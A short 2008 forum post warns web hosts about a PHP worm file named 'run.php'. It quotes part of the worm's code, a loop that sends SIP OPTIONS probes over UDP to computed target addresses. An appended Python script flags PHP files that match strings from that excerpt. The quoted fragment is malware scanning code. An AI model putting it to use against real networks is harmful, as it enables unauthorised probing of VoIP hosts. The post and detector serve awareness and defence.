PHP Worm Virus
Posted: Sun Nov 02, 2008 9:26 am
A friend from the Netherlands who normally does WordPress stuff sent me the source code to a worm virus that he received. This thing is very dangerous in what damage it could do, or what it could download or do on your website and other parts of the web. Please be on the lookout for a "run.php" file that may or may not be this thing on any of your web hosts. Just thought I'd suggest this to you.
Some parts of the file were:
$curip = $targets[$curtarget][0] + $targetid;
$curip = mylong2ip($curip);
$out = "OPTIONS sip:$curip SIP/2.0\r\n";
$out .= "Via: SIP/2.0/UDP 127.0.1.1:5060;branch=z9hG4bK-3408002827;rport\r\n";
$out .= "Content-Length: 0\r\n";
$out .= "From: \"siplicious\"<sip:100@1.1.1.1>; tag=0101010113c4\r\n";
$out .= "Accept: application/sdp\r\n";
$out .= "To: \"siplicious\"<sip:100@1.1.1.1>\r\n";
$out .= "Contact: sip:None@127.0.1.1:5060\r\n";
$out .= "CSeq: 1 OPTIONS\r\n";
$out .= "Call-ID: 700556890817406150532338\r\n";
$out .= "Max-Forwards: 70\r\n";
$out .= "\r\n";
socket_sendto($sock, $out, strlen($out), 0, $curip, 5060);
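
A sweep a host owner could run for the file described in this post, as an added example that is not part of the original post or of the worm's code: it walks a web root and flags PHP files containing the strings visible in the excerpt above. The function names, the two-indicator threshold and the file-suffix list are assumptions made for this example.

```python
import os
import re

# Indicator strings taken from the excerpt quoted in the post.
INDICATORS = {
    "sip_options_request": re.compile(rb"OPTIONS\s+sip:", re.I),
    "siplicious_name": re.compile(rb"siplicious", re.I),
    "fixed_via_branch": re.compile(rb"z9hG4bK-3408002827"),
    "fixed_call_id": re.compile(rb"700556890817406150532338"),
    "udp_send_to_5060": re.compile(rb"socket_sendto\s*\([^;]*\b5060\s*\)"),
}
PHP_SUFFIXES = (".php", ".phtml", ".inc")  # assumed list of PHP-handled suffixes


def scan_file(path, max_bytes=2_000_000):
    """Return the sorted names of the indicators found in one file."""
    with open(path, "rb") as fh:
        data = fh.read(max_bytes)
    return sorted(n for n, rx in INDICATORS.items() if rx.search(data))


def scan_tree(root, min_hits=2):
    """Map path -> indicators for PHP files under root that need a manual look.

    A file is reported when it has at least min_hits indicators, or a single
    indicator if it is named run.php (the filename mentioned in the post).
    """
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            try:
                hits = scan_file(path)
            except OSError:
                continue  # unreadable file: skip it rather than abort the sweep
            if len(hits) >= min_hits or (hits and name.lower() == "run.php"):
                findings[path] = hits
    return findings


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in sorted(scan_tree(root).items()):
        print(f"{path}: {', '.join(hits)}")
```

A hit means the file deserves inspection, not that it is this worm; a file with none of these strings may still be a renamed or altered copy.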